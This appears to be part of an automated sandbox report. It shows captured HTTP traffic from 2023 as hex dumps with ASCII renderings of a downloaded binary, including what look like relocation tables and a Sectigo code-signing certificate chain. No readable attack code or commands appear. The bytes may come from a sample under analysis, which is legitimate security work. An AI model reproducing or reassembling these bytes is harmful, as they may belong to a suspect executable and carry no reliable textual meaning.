                  2023-01-13 15:04:35 UTC1290INData Raw: c0 50 7a 8e c5 9d b0 bb 83 4f 67 60 11 81 d4 67 a5 cd 54 d1 c6 65 c1 fd 28 81 74 33 41 a4 48 f3 bc 57 41 b2 8e 3d 63 54 64 5e 27 23 ce bd 4c 2f 01 17 a5 57 23 06 61 c2 fd dc 3b 1c 7c 8b f3 ac 98 21 c8 5a 9e d4 ed d6 76 25 94 fd b4 dc 48 cd 68 3d b1 16 54 9c 97 dd 29 be e6 4a bc 0e 6a d4 2f 57 e8 85 f4 a7 ad 75 33 d8 21 c4 5b e1 1a a3 03 94 0f e0 60 86 00 f4 3d 1b 28 66 dd 21 23 03 67 1e fd 0f ad 4a 9d 74 ba e7 cf 71 d8 6f 8f 9b d0 6a 6f ea 18 18 13 b7 9e 7f 9e 10 11 6a 0d 6c 46 e6 81 79 1b 81 21 26 a0 a2 7b 9c 4e e2 42 aa a9 df b0 91 c7 b2 d9 7a ff c6 64 bb c7 68 2c 3a c7 6f 27 d1 7f 31 e6 a4 9d 8d 5d 15 0c 50 8e 3e a9 42 0d 4f 88 9e 60 82 10 ed 1f 7c 3e 46 07 8e 8a a6 da f9 3b 25 92 63 c2 01 ba 06 7f fc c2 bd 19 a7 b0 71 f1 43 25 15 13 70 5a 1c 70 ee 44
                  Data Ascii: PzOg`gTe(t3AHWA=cTd^'#L/W#a;|!Zv%Hh=T)Jj/Wu3![`=(f!#gJtqojojlFy!&{NBzdh,:o'1]P>BO`|>F;%cqC%pZpD
                  2023-01-13 15:04:35 UTC1298INData Raw: 09 b4 2c 0e ba c8 16 01 fb 29 13 da 00 05 93 95 2e 99 d0 54 d2 6a 99 5a 9e a0 64 da c9 c4 e9 e9 59 69 73 79 0c 26 ca 4e 4a 4a cf 4d c3 19 0b d4 3e 01 e9 4a 4e 7e 35 31 5f 32 08 f2 74 68 59 3b 62 e9 fe f3 29 d1 31 31 eb 27 4d 4d fb c9 4c ba 9c cc ec bf 5e 2e cf 54 95 ce fd 6a 90 b5 95 fd e5 96 b5 a2 73 71 aa cf c0 f6 b0 bd 88 55 1b 2c 57 dd 11 ae 69 99 a9 f9 26 53 98 0b 2d 31 29 37 66 2e 9b 76 79 79 f9 d9 96 8e b2 52 96 d3 a5 86 e6 67 a2 7d c4 64 a3 c5 a9 89 3f a3 4c 20 4d 4c da 7e 7e c5 c8 ca 42 5a b7 ab 55 2e 8a ab c8 be 18 58 58 a5 cd 86 ea fe 71 bd 25 27 66 a5 66 e6 e6 e7 e7 a6 a5 e5 27 a6 e7 67 b7 a9 4f ca 5d cf 4e 24 98 4e b4 9d 2f 39 68 2b 7e 4a cd 70 74 d4 89 c1 8c af e6 24 ff cc b1 d6 9b 56 fa 26 ab 93 f3 2d 6a a5 af e2 26 b2 a0 1d 28 ab e2 64 55
                  Data Ascii: ,).TjZdYisy&NJJM>JN~51_2thY;b)11'MML^.TjsqU,Wi&S-1)7f.vyyRg}d?L ML~~BZU.XXq%'ff'gO]N$N/9h+~Jpt$V&-j&(dU
                  2023-01-13 15:04:35 UTC1306INData Raw: fe bf 30 0d ef be 51 d6 96 72 2c b6 10 8f 78 26 e1 21 6f ca 30 bf 12 f0 a3 9c c8 12 7b 5a 9a a6 bc 77 fe 6b ee ee d3 20 8c ef b3 76 21 57 c9 4c c2 6a 9d fb 0a 81 f0 d1 2f 99 33 7a a7 0e 37 e1 f8 a4 9c aa 3a 46 45 d3 41 dc dc 19 7a 52 b0 15 a1 7b 32 fe 43 b6 c9 40 5b 5f 60 e4 23 2d 2b 01 01 1f 11 ae d2 7d 16 39 76 83 3a 61 13 bc 7a a9 5d 7b b5 e8 09 4a 71 6d d1 50 c2 21 48 c4 0e 33 87 52 74 28 61 57 3e 88 f8 e9 e5 8a e7 ea ba 14 c2 c3 02 38 55 df 44 f1 1f 76 eb f4 9c 6d 22 4d 60 a6 e0 7d 67 9c dd bb 63 1d 67 23 71 5e 95 bd 5d 9a 8f 27 cf ef 72 ec 8f 55 2b 93 08 61 54 7d 61 27 ff ec 2d 4b 94 ff b6 d4 8e 89 5b 8a e4 45 9d e8 f3 8d 90 0f 7f 39 c5 d4 45 e2 d3 ef 46 31 e1 16 cb 43 08 7a 62 d4 43 89 58 93 81 98 38 76 e4 9c 74 dc 83 55 5e a8 31 f7 74 4e 66 50 a5
                  Data Ascii: 0Qr,x&!o0{Zwk v!WLj/3z7:FEAzR{2C@[_`#-+}9v:az]{JqmP!H3Rt(aW>8UDvm"M`}gcg#q^]'rU+aT}a'-K[E9EF1CzbCX8vtU^1tNfP
                  2023-01-13 15:04:35 UTC1313INData Raw: 2c b8 24 c5 86 bf d6 14 fa 2a 3e 81 f0 a6 83 95 8a dc 7d ea ac 22 0c 1e b3 72 78 9a e5 2f ab cd d0 7d 48 ab f5 b7 81 9b 36 e1 9c bc fe ef 57 65 9f 40 e6 30 1e e3 95 9c da 33 e2 3f 7b c1 22 e5 17 ef f4 e2 f7 22 cb 7c eb 53 47 9b c7 58 16 0b c9 65 1f 18 c5 48 d1 18 d0 52 e7 7c 29 90 49 18 9d 7c 2a c9 29 f1 08 28 0f be 11 b3 13 70 8d 5a c5 4f a1 93 4a 96 77 43 97 18 74 ea 9f d6 e7 22 c7 9f 94 24 47 83 90 09 d6 a5 06 2d 6e 6c a0 c3 28 cc 99 8f b3 8e b8 72 c9 37 79 79 e5 75 aa 82 db d0 08 f6 6a 3f 9f c6 01 f2 2c f1 dc 2c e6 e3 e4 f4 ef 89 74 63 3c 49 f3 1e 8b c7 3c 1e c7 3f 56 8b fa ae 31 b9 ee 23 28 20 c2 c3 b5 ef c4 8d fd c0 49 82 51 e1 9e 0a 4c 50 2e 91 28 b5 7a 06 a5 ec fe 40 1b f8 84 d3 2e 2f a6 23 20 96 a1 07 cf 29 89 a9 49 d2 ab df ef 4c c2 2b bf 5e 34
                  Data Ascii: ,$*>}"rx/}H6We@03?{""|SGXeHR|)I|*)(pZOJwCt"$G-nl(r7yyuj?,,tc<I<?V1#( IQLP.(z@./# )IL+^4
                  2023-01-13 15:04:35 UTC1321INData Raw: e1 7b 1b e4 0e 1c 89 e8 17 7b 77 42 99 2f 47 14 95 87 45 bd bb 11 6c a2 6d 75 bc 04 6a d1 81 e0 a0 51 7c ed c0 ef e6 9c a4 75 ef 55 dd 3f 75 65 dd 2c 1e 91 71 7b a8 75 dc 67 6e c6 2b b5 7f 3c c3 ff e7 ca e8 4a 14 fa 3e 0e 36 dc a0 df 09 45 e1 58 3a 79 24 3f 08 14 2c 3b 67 0a 6e 0a c3 c4 45 96 ba e9 e0 12 15 f2 54 b0 81 47 8e dd 3f d1 c4 7c 4c f3 4d 05 13 20 85 d1 68 4a 4f d1 ed ce 8b fe 1f d1 56 3e 3b 2b a0 17 10 cc 25 ca 8b fd 93 10 70 0c ea 4b 5e 81 24 7d f6 75 53 b7 ab fe e1 3f 85 9a d1 90 d2 e7 73 16 13 23 35 a4 34 f5 5e 15 12 32 b4 ff 57 2a 86 f5 d2 28 b6 2f 0b ce 7c 98 2a de 0d e6 84 83 47 8a cd b8 4d 03 f9 14 cc 05 55 53 06 2c 6e f9 2e eb cf 9d 34 2a a6 49 6f 03 40 d0 ee 4f 3a ed c0 c3 54 5c 3e e9 1b 72 10 61 bb 48 57 12 13 85 7c e9 63 b1 5f ea 09
                  Data Ascii: {{wB/GElmujQ|uU?ue,q{ugn+<J>6EX:y$?,;gnETG?|LM hJOV>;+%pK^$}uS?s#54^2W*(/|*GMUS,n.4*Io@O:T\>raHW|c_
                  2023-01-13 15:04:35 UTC1329INData Raw: 6f fa f0 b4 34 cf 77 48 9e 89 92 3a 19 7c c4 2e 4e 7c d4 9f a6 e6 1e b4 fd 15 37 2d 4e 1d 86 50 05 68 f9 98 bd ec e0 f1 7d da bb 83 0b c1 e4 fd a1 80 5b 39 ca 38 a9 76 ff 98 c4 f7 51 72 75 b7 08 36 f6 f6 21 e4 ae d3 aa 8f 19 e0 86 5c e9 5a 37 64 3f 23 ca d7 a2 5d f4 88 dc e6 ad 05 78 bb ff 4c ca 36 9f 2c c0 cd fd ea c2 cb 13 01 80 8a cc 03 d0 ed 09 6a 9a ab a8 8f e3 5b b7 12 35 6d f7 55 c3 a8 c4 03 0d 6b 2a 31 a6 7f 97 99 47 88 5b e9 ad e8 ec 86 b7 8c bd 3a 7d 8e 83 38 bc 86 7b 20 9e 74 42 9d f1 f8 b1 10 75 ff 2d bc 9c b9 61 32 9a 07 13 9a fb 6d 11 f6 5c fb db 37 76 fd 03 1f 4f 0c 4c b2 35 f1 b7 bd f1 ef bb 73 6e 05 fe 40 17 d9 13 da 59 35 4e 77 6e 34 6d ab 82 2d ed 47 6b 35 1a a3 fa 2c d7 ff d7 52 63 a5 44 db 9c d1 e2 65 bc c3 69 6f 85 ea 98 92 56 c1 91
                  Data Ascii: o4wH:|.N|7-NPh}[98vQru6!\Z7d?#]xL6,j[5mUk*1G[:}8{ tBu-a2m\7vOL5sn@Y5Nwn4m-Gk5,RcDeioV
                  2023-01-13 15:04:35 UTC1337INData Raw: f3 8c 66 c0 b8 9d 45 72 53 ff bd 5e b5 a9 d5 ab 12 57 42 a3 35 d3 c5 8a e1 57 8b 22 ee 30 37 a1 70 42 e0 d3 62 3c a1 8d 34 c6 14 29 5a 0d 43 a0 49 e9 5f 68 5a 10 60 6c 07 ca 61 61 d3 fc 80 cd b5 7e 7d d9 72 23 42 ac be ba 72 5b f9 bc 75 f6 a0 85 5f a9 f1 e2 ab f5 a3 ea 4f 5d 90 40 0c dd 2c 3f bd b3 ff b8 be 51 11 2e 30 8e 1f 30 be a0 f8 cc 8f 62 0f 64 89 74 7c 9e 56 12 f0 7f 80 2c fb 76 5b 54 60 42 58 dc d1 3e 44 b4 75 f3 d5 cc e5 1e b5 18 68 6b 9a e2 8f ea cd b4 8d 8a 30 53 d4 f2 eb 86 d6 5e 6c 14 79 24 78 6c ca 76 5f 2b bd 07 f7 03 a2 11 f7 f6 37 39 7a 3b cc bf 4c 4f 2d be 73 65 c1 5c db 1a ee 6b b3 79 d3 b3 da 77 95 eb 45 bf fa 89 2c ce 6c 75 23 7c af 28 5d f2 27 f6 fa 67 50 f7 01 61 09 92 d8 7f 83 5e fe 19 45 07 e6 47 8f ad e4 54 1b a2 bf ee ed e7 bb
                  Data Ascii: fErS^WB5W"07pBb<4)ZCI_hZ`laa~}r#Br[u_O]@,?Q.00bdt|V,v[T`BX>Duhk0S^ly$xlv_+79z;LO-se\kywE,lu#|(]'gPa^EGT
                  2023-01-13 15:04:35 UTC1345INData Raw: 3d c6 2d 86 b5 ad ba 6c 9b dd 68 69 84 8d c5 50 90 84 14 8b 63 a8 a3 54 5a 14 d1 90 d5 56 5f 6d b6 f6 0c ab 86 22 31 8c 01 10 99 a1 aa a2 80 bb 00 03 df 1f 57 a7 dc 4f 70 a4 a4 f7 c1 b8 2c aa 6f f9 da c6 05 5f fb f8 c2 b6 a3 0c 36 9a cd a5 b9 24 2b 14 4a 6b 86 45 b1 90 14 be 66 ab 6c c8 c2 79 d5 95 1b aa 38 33 68 e9 61 b6 75 b4 6a c3 61 92 7d bc 2f 2b e4 0e f3 46 a6 3c 57 17 06 b2 9d fe 37 42 82 d5 d5 37 00 89 5f 80 00 61 00 00 12 00 b0 19 31 03 93 b5 f3 9f f2 a5 f5 d8 72 b2 fb 3b 03 ff 82 bf 08 88 0e a2 a2 3f f2 15 c8 98 e1 2f 2c 04 90 3d 65 42 fc dc 5c dc 9d ef aa 73 be fc 99 7a ff 53 10 ac ac 9d 15 42 74 3b ac 10 9f fb b9 d6 48 ff c6 e7 b6 d8 fa b5 ef 0b 7d 93 f4 56 40 57 40 57 0c ae 84 ae 85 ae 31 5c e2 57 ca af 0a e2 2a 88 5e 21 ae 1c ae 88 5c 89 5d
                  Data Ascii: =-lhiPcTZV_m"1WOp,o_6$+JkEfly83hauja}/+F<W7B7_a1r;?/,=eB\szSBt;H}V@W@W1\W*^!\]
                  2023-01-13 15:04:35 UTC1352INData Raw: 12 42 01 1e 7a 76 21 04 b4 21 4e fe fb 5e 13 c3 47 ad 21 d0 7b 9c 02 6b a6 5d 0f 02 53 8b 0c 7f f3 c0 52 c4 20 54 21 21 ed b4 13 a7 d0 5e 9d 16 90 08 10 bd 87 84 b6 29 8b 9d 40 7b ea 5a 94 3f 42 a0 19 12 ab b5 0f d5 64 0c 75 d4 ab 0b cb c0 dd 2e ef f7 46 68 76 5b ea e5 11 da 92 97 ea d4 21 c4 d7 21 42 7e 9c 5a db 19 05 91 20 51 5b 65 93 50 be 97 ca 50 d3 f2 9e 7e b0 0c e6 ed b4 83 b5 c0 db 6b 95 d7 21 7d 20 f1 a5 d5 24 04 82 39 f5 e3 21 2c d6 21 f5 96 40 f9 b8 1c 35 5e 21 30 57 21 34 6e d0 ba de 8c 6e 8b 72 f8 04 07 c1 dc 4f 57 90 90 c8 ea a8 7a 32 a8 69 5d 85 b2 78 06 69 03 f8 d5 47 65 60 70 b4 48 b5 c0 06 ba 4f 0f 24 84 85 2d 3f e1 c0 52 fb ee 0e 83 a6 0d ef 02 dd a0 c3 fa 78 1f 06 37 5b 0a 04 4c 37 23 4f 03 49 5f 9f 6a 8a fc 89 36 12 c2 4a 1b 75 d3 86
                  Data Ascii: Bzv!!N^G!{k]SR T!!^)@{Z?Bdu.Fhv[!!B~Z Q[ePP~k!} $9!,!@5^!0W!4nnrOWz2i]xiGe`pHO$-?Rx7[L7#OI_j6Ju
                  2023-01-13 15:04:35 UTC1360INData Raw: 37 10 6b 0b 06 c4 81 8f 13 57 47 ea b9 fd e2 ed 5d 0b 20 b7 57 74 c4 ef a5 3a e7 f5 3b fc dd b5 9c 1e aa b8 7e b9 76 1a 4d 8e 0f f3 56 bc a5 8f 4c a8 0d ff 6f e5 b3 a9 d5 ba 3e 65 4d a7 68 c4 d5 fd d4 1a ee 02 a3 d9 8f e7 df 5e ef 34 0b 53 4f 35 05 fa 0b ee cb 47 53 b5 ff d7 54 f7 fe bf ad f4 af af ba 4f 9f 3c 00 80 54 79 6e fd b7 7d 6e d8 af 6f 4a cf 7b ae e4 93 c5 15 bf 48 d1 ea b0 61 bc 2f de 53 d2 8a 4f 95 0d 37 c8 1c 98 17 4a 05 db 54 34 5e 79 74 01 ee 05 e2 09 ee 8f 56 cf af ef 0f 6f ef 0f 10 cf 0f b4 3e e6 09 01 e5 aa 02 45 03 b7 3d 7e 2a d1 82 2e 4f ae 2a 2f 50 f0 6f 1f 50 ab 86 aa ad 1e a0 f4 9e fa 70 f6 da f1 f8 be c4 b9 aa 88 2c d8 27 3e 25 17 c5 20 5e 95 1f 3c 3f 55 a9 a3 03 e1 81 15 4c bf b9 5f 45 5f e0 1e de df 7e 2a 1f 53 7e d1 74 b9 52 5d
                  Data Ascii: 7kWG] Wt:;~vMVLo>eMh^4SO5GSTO<Tyn}noJ{Ha/SO7JT4^ytVo>E=~*.O*/PoPp,'>% ^<?UL_E_~*S~tR]
                  2023-01-13 15:04:35 UTC1368INData Raw: d1 5f 4d 93 c5 83 3d 94 2d 20 d7 18 56 6d 39 42 6f a1 ff f6 b0 4b 5e cf 72 16 00 90 00 00 e5 04 04 90 84 ab c8 2d 80 00 00 00 f7 01 ae fe 57 98 2e 77 38 9c d4 db 00 00 0f 00 cf 71 cd fe 3f 7c a0 de 00 00 4e 00 fe 31 7d 61 c6 56 77 ee 00 f6 00 10 00 00 28 2b 9e 00 ef 3c ac b2 90 23 00 01 00 00 ff 03 5f 28 3c 1e 00 ff 00 02 00 00 79 07 01 40 ed e7 c6 e5 60 1e 00 00 e0 02 dc 93 ab 36 15 a6 cb dd 0e a7 e6 36 11 b2 5c 8d 1c 21 e1 f5 29 67 00 00 00 00 cd 56 bb 3b d5 a7 7d be ed 53 00 f5 00 00 71 02 e7 8f 13 7d b3 53 aa 5e fa 66 10 00 00 00 3a 00 40 cb fa 07 3e d1 d4 9d d8 4d 40 00 00 00 f3 00 03 e0 a3 6c dd 5e eb 72 90 d3 00 01 00 00 9c 03 fe 75 c0 fe be 13 76 69 00 f5 00 00 1a 03 96 25 80 6d 00 00 38 00 00 f8 b9 1f d3 f7 1e 35 51 13 00 f2 cd 3f 53 d3 00 d4 00
                  Data Ascii: _M=- Vm9BoK^r-W.w8q?|N1}aVw(+<#_(<y@`66\!)gV;}Sq}S^f:@>M@l^ruvi%m85Q?S
                  2023-01-13 15:04:35 UTC1376INData Raw: 99 f7 fa e3 24 29 21 48 aa 34 97 9f 60 a4 d9 d3 50 df 1e 38 a9 88 9c a0 6e 26 77 9e d3 1d 28 3f 75 ca 0d fe 80 4f f5 60 5a 51 26 ab fd ce 7d f7 89 59 f3 15 ab ce e2 ec 82 aa a4 8e e1 9f 44 0e e0 72 6f d1 7d ce 11 f0 0f d3 44 89 9b b8 83 5e 1f 5d b4 8d 09 fe 3c 56 6d f2 2e e7 77 09 a2 0f 11 71 4b d5 7d 53 fe e6 79 97 ac f0 73 fc 19 c2 40 59 a1 d4 26 a5 b7 e6 fb 44 bb c6 9a d2 bf 15 ae 4d 4d c8 3d d4 b7 84 ac 60 ae e4 09 9d e8 ed 3a 2e 1b da d9 02 17 a7 c3 24 b9 a8 4a 6b 8b 9a c4 aa 8e a1 0a 31 4b 1e d6 36 09 78 b8 a2 8c 29 ad e8 b9 2b 8a 93 69 fc 09 b5 1c 92 11 c8 91 9c 92 97 e7 63 8d d8 57 de 34 5b 85 df 46 57 d2 c6 24 90 02 6b 29 63 dc c2 79 9f cf c4 c8 5f 80 1f 8a 71 d0 e8 eb fe e6 b9 83 7b e8 17 c7 ca 58 c3 27 1e 4d 46 df 83 2e 21 f3 bc 4b a9 09 2d f9
                  Data Ascii: $)!H4`P8n&w(?uO`ZQ&}YDro}D^]<Vm.wqK}Sys@Y&DMM=`:.$Jk1K6x)+icW4[FW$k)cy_q{X'MF.!K-
                  2023-01-13 15:04:35 UTC1384INData Raw: 31 da 31 e3 31 e8 31 05 32 15 32 24 32 30 32 36 32 42 32 48 32 63 32 a6 32 b8 32 eb 32 f1 32 02 33 08 33 0d 33 18 33 1e 33 2d 33 41 33 4e 33 5d 33 7f 33 8d 33 98 33 9e 33 a6 33 b6 33 bb 33 cf 33 d5 33 f1 33 03 34 09 34 0e 34 13 34 43 34 76 34 80 34 af 34 c0 34 07 35 16 35 3c 35 6e 35 bb 35 c8 35 d7 35 67 36 6d 36 a0 36 c3 36 f9 37 23 38 3a 38 83 38 a8 38 32 3a 80 3a 2c 3b 5e 3b b5 3b e3 3b 13 3c 18 3c 49 3c 4e 3c c3 3c d6 3c 03 3d 3d 3d 42 3d 83 3d e7 3d 40 3e 5e 3e 6b 3e 85 3e cd 3e ea 3e f0 3e f6 3e fc 3e 06 3f 0c 3f 22 3f 28 3f 30 3f 36 3f 3e 3f 5e 3f 64 3f 99 3f ae 3f b3 3f c6 3f cb 3f d5 3f e0 3f 00 00 00 80 00 00 58 01 00 00 06 30 0c 30 26 30 32 30 38 30 44 30 5c 30 73 30 96 30 b0 30 b8 30 c4 30 da 30 01 31 0b 31 18 31 3b 31 55 31 8b 31 9e 31 a4 31
                  Data Ascii: 111122$20262B2H2c2222233333-3A3N3]333333333334444C4v444455<5n5555g6m6667#8:8882::,;^;;;<<I<N<<<===B===@>^>k>>>>>>>??"?(?0?6?>?^?d????????X00&02080D0\0s000000111;1U1111
                  2023-01-13 15:04:35 UTC1392INData Raw: 35 ec 35 50 36 55 36 b7 36 cd 36 d4 36 13 37 4a 38 9a 38 a7 38 e4 38 fa 38 8d 39 00 3a 12 3a 32 3a 63 3a 36 3b 94 3b b5 3b d6 3b 0d 3c 7c 3c 90 3c c5 3c e3 3c 18 3d 27 3d 48 3d 5f 3d ba 3d 1b 3e 39 3e 59 3e bc 3e c1 3e 18 3f 1d 3f 47 3f 4c 3f 91 3f 96 3f ce 3f 00 00 00 70 03 00 48 01 00 00 05 30 43 30 64 30 c7 30 d8 30 ed 30 21 31 37 31 4c 31 8a 31 d2 31 0e 32 28 33 53 33 62 33 b7 33 eb 33 f8 33 05 34 0a 34 1d 34 2a 34 2f 34 59 34 5e 34 9a 34 a7 34 b4 34 b9 34 cc 34 d9 34 de 34 08 35 0d 35 3b 35 48 35 55 35 5a 35 71 35 7e 35 83 35 b1 35 b6 35 ea 35 f7 35 04 36 09 36 1c 36 29 36 2e 36 58 36 5d 36 8b 36 98 36 a5 36 aa 36 c1 36 ce 36 d3 36 2b 37 38 37 45 37 4a 37 61 37 6e 37 73 37 a6 37 ab 37 da 37 e7 37 f4 37 f9 37 0c 38 19 38 1e 38 45 38 4e 38 9b 38 a8 38
                  Data Ascii: 55P6U66667J888889::2:c:6;;;;<|<<<<='=H=_==>9>Y>>>??G?L????pH0C0d0000!171L1112(3S3b3333444*4/4Y4^4444444455;5H5U5Z5q5~555555666)6.6X6]66666666+787E7J7a7n7s7777777888E8N888
                  2023-01-13 15:04:35 UTC1399INData Raw: 31 48 31 4e 31 6a 31 70 31 8a 31 a0 31 a5 31 ce 31 f6 31 fc 31 02 32 08 32 14 32 1a 32 26 32 2c 32 45 32 4b 32 5a 32 60 32 a1 33 b0 33 b6 33 0c 34 17 34 41 34 5d 34 7b 34 90 34 a7 34 d5 34 96 37 2c 38 c8 38 e6 39 f2 39 fb 39 09 3a 18 3a 29 3a 30 3a 3c 3a 42 3a 73 3a a6 3a d2 3a 01 3b 1c 3b 29 3b 41 3b 54 3b 59 3b 71 3b 89 3b fc 3b 13 3c fc 3c 05 3e 91 3e a3 3e ac 3e b4 3e ba 3e c2 3e d8 3e de 3e eb 3e f1 3e fa 3e 01 3f 24 3f 57 3f 61 3f 6b 3f d7 3f 00 00 00 70 06 00 60 00 00 00 84 30 97 30 9c 30 44 31 54 31 6e 32 dd 32 e2 32 26 34 3b 35 84 35 b2 35 03 36 31 36 6c 37 7a 37 1b 38 4b 38 5b 38 b0 38 0b 39 19 39 68 39 76 39 80 3a cd 3a ab 3b f8 3b fd 3b 32 3c 37 3c 9b 3c fd 3c 38 3d 3d 3d 5e 3d 65 3d 6d 3d 7c 3d ff 3d 06 3e 3d 3e 4a 3e 00 00 00 80 06 00 a8 00
                  Data Ascii: 1H1N1j1p11111112222&2,2E2K2Z2`233344A4]4{44447,88999::):0:<:B:s:::;;);A;T;Y;q;;;<<>>>>>>>>>>>>?$?W?a?k??p`000D1T1n222&4;555616l7z78K8[8899h9v9::;;;2<7<<<8===^=e=m=|==>=>J>
                  2023-01-13 15:04:35 UTC1407INData Raw: 00 5c 00 00 00 58 30 f4 30 05 32 21 33 88 33 d3 33 22 35 50 35 01 38 13 38 25 38 4b 38 56 38 66 38 9f 38 ef 38 f5 38 68 39 31 3a 67 3a 87 3a b3 3a 92 3b 9f 3b ca 3b a2 3d ad 3d c0 3d ca 3d e8 3d f3 3d 4e 3e 6a 3e d0 3e e8 3e 18 3f 40 3f 72 3f 8c 3f b2 3f c4 3f 00 00 00 30 0c 00 64 00 00 00 70 30 a1 30 1e 32 ad 32 5e 33 3d 36 dc 36 0a 39 10 39 16 39 1c 39 43 39 6f 39 9b 39 a6 39 ad 39 b9 39 c3 39 cd 39 d1 39 d7 39 db 39 e3 39 ed 39 03 3a 14 3a 46 3a 52 3b 5d 3b 64 3b 6a 3b 79 3b 84 3b 8a 3b 90 3b a4 3b ac 3b 02 3c 16 3c e4 3c 58 3d 66 3d 35 3f 40 3f 4d 3f 59 3f 00 40 0c 00 a0 00 00 00 82 30 ed 30 07 31 14 31 44 31 68 31 73 31 80 31 a2 31 11 32 22 32 6a 32 83 32 07 33 1c 33 25 33 2e 33 4e 33 39 34 69 34 b9 34 08 35 4e 35 5e 35 7e 35 84 35 90 35 af 35 b5 35
                  Data Ascii: \X002!333"5P588%8K8V8f8888h91:g:::;;;======N>j>>>?@?r????0dp0022^3=669999C9o999999999999::F:R;];d;j;y;;;;;;<<<X=f=5?@?M?Y?@0011D1h1s1112"2j2233%3.3N394i445N5^5~55555
                  2023-01-13 15:04:35 UTC1415INData Raw: 34 b4 34 bc 34 c0 34 c4 34 c8 34 cc 34 d0 34 d4 34 d8 34 dc 34 e0 34 e8 34 ec 34 f0 34 f4 34 f8 34 fc 34 00 35 04 35 08 35 0c 35 10 35 18 35 1c 35 20 35 24 35 28 35 2c 35 30 35 34 35 38 35 3c 35 40 35 44 35 48 35 4c 35 50 35 54 35 58 35 5c 35 60 35 64 35 68 35 6c 35 70 35 74 35 78 35 7c 35 80 35 84 35 88 35 8c 35 90 35 94 35 9c 35 a4 35 ac 35 b4 35 bc 35 c4 35 cc 35 d4 35 dc 35 e4 35 ec 35 f4 35 fc 35 04 36 0c 36 14 36 1c 36 20 36 24 36 28 36 2c 36 30 36 3c 36 40 36 44 36 48 36 4c 36 50 36 54 36 58 36 5c 36 60 36 64 36 68 36 6c 36 70 36 74 36 78 36 80 36 84 36 88 36 8c 36 90 36 94 36 9c 36 a0 36 a4 36 a8 36 ac 36 b0 36 b4 36 b8 36 bc 36 c0 36 c4 36 c8 36 cc 36 d0 36 d4 36 d8 36 dc 36 e0 36 e4 36 e8 36 ec 36 f0 36 f4 36 f8 36 fc 36 00 37 04 37 08 37 0c 37
                  Data Ascii: 4444444444444444445555555 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|555555555555555555556666 6$6(6,606<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x666666666666666666666666666666667777
                  2023-01-13 15:04:35 UTC1423INData Raw: d6 ff a4 97 8f 90 00 fe b8 85 71 d1 20 06 ca 16 2e 0b 60 59 bd 31 b1 44 4c e6 44 41 9e be fa 79 6a 6b f4 3d d8 d2 72 bf e4 6c 19 00 af 81 0e e8 3b 86 bc 85 4d 8a eb f7 b9 ae 60 22 ee 20 88 a9 d6 72 87 6c 8e cb c0 a5 8c 50 53 50 8d 79 48 9a fd a1 4c f7 94 9e f5 c5 09 d7 5d c3 74 16 c4 3d dc 9c 3b 31 dd ac b3 14 0f b2 a4 33 ca d2 86 77 31 68 d5 e1 9b f2 e8 24 a4 13 02 03 01 00 01 a3 82 01 9c 30 82 01 98 30 1f 06 03 55 1d 23 04 18 30 16 80 14 0f 2a cb 20 87 28 b8 ec 6f 48 ae 2b 54 a6 29 aa 17 a4 cd 0c 30 1d 06 03 55 1d 0e 04 16 04 14 ff 81 bd 4d 75 16 75 02 b0 be 63 75 70 ab 31 77 db d2 e0 3f 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 07 80 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 03 30 11 06 09 60
                  Data Ascii: q .`Y1DLDAyjk=rl;M`" rlPSPyHL]t=;13w1h$00U#0* (oH+T)0UMuucup1w?0U0U00U%0+0`
                  2023-01-13 15:04:35 UTC1431INData Raw: 6f 63 73 70 2e 73 65 63 74 69 67 6f 2e 63 6f 6d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 03 82 02 01 00 73 da ed 68 72 cb c2 b9 40 a1 31 bb b4 03 a3 2d 14 7b 24 e7 b4 5b 15 7d a8 e9 fd ad d1 92 0d 7c 3d 36 a0 69 d9 f3 9a 30 da ac 69 d6 74 57 24 3f 7e 0f 3c d9 f5 c3 79 25 6c 26 e8 8d 68 93 ce f1 77 89 39 7f a8 04 05 da 34 c3 14 ea 9f 08 54 ab ff c4 7e 96 6c 2b d3 94 eb b4 6c e0 45 4d 2c b2 f7 3b 3b 5a b5 c1 fb d7 89 75 6d 98 72 72 f6 f7 07 28 f3 d3 b2 d0 eb 19 be 15 2c 78 ef cd 45 a0 00 e4 f8 04 76 bb 57 c5 90 be 77 54 90 74 9e 0b 4f 4d c4 aa 13 8f 97 af 01 35 2b cb 9b 11 78 e9 f2 f9 89 04 3c 4e e3 82 12 62 eb b4 44 0c 75 41 c2 0f 34 b8 88 9d c8 22 f1 13 6a db 18 2f 6e 78 ad c4 05 b4 e8 84 08 93 07 f9 7d 83 fe 68 98 34 e4 77 e5 b1 ce 8c 94 6c db 03 6d
                  Data Ascii: ocsp.sectigo.com0*Hshr@1-{$[}|=6i0itW$?~<y%l&hw94T~l+lEM,;;Zumrr(,xEvWwTtOM5+x<NbDuA4"j/nx}h4wlm
                  2023-01-13 15:04:35 UTC1438INData Raw: 99 c1 05 8b ab 0c 2f f3 5c 3a cf 6c 37 55 09 87 de 53 40 6c 58 ef fc b6 ab 65 6e 04 f6 1b dc 3c e0 5a 15 c6 9e d9 f1 59 48 30 21 65 03 6c ec e9 21 73 ec 9b 03 a1 e0 37 ad a0 15 18 8f fa ba 02 ce a7 2c a9 10 13 2c d4 e5 08 26 ab 22 97 60 f8 90 5e 74 d4 a2 9a 53 bd f2 a9 68 e0 a2 6e c2 d7 6c b1 a3 0f 9e bf eb 68 e7 56 f2 ae f2 e3 2b 38 3a 09 81 b5 6b 85 d7 be 2d ed 3f 1a b7 b2 63 e2 f5 62 2c 82 d4 6a 00 41 50 f1 39 83 9f 95 e9 36 96 98 6e 30 82 06 ec 30 82 04 d4 a0 03 02 01 02 02 10 30 0f 6f ac dd 66 98 74 7c a9 46 36 a7 78 2d b9 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 4e 65 77 20 4a 65 72 73 65 79 31 14 30 12 06 03 55 04 07 13 0b 4a 65 72 73 65 79 20 43 69 74 79 31 1e 30
                  Data Ascii: /\:l7US@lXen<ZYH0!el!s7,,&"`^tShnlhV+8:k-?cb,jAP96n000oft|F6x-0*H010UUS10UNew Jersey10UJersey City10



                  Target ID:0
                  Start time:16:04:33
